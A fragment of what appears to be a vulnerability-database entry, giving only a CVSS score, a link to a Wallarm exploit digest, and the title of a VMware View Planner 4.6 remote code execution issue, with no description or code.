"id": "WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "href": "https://lab.wallarm.com/exploit-digest-march-15-21-vulnerabilities-vmware-win32k-windows-containers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

VMware View Planner 4.6 Remote Code Execution

Description

Related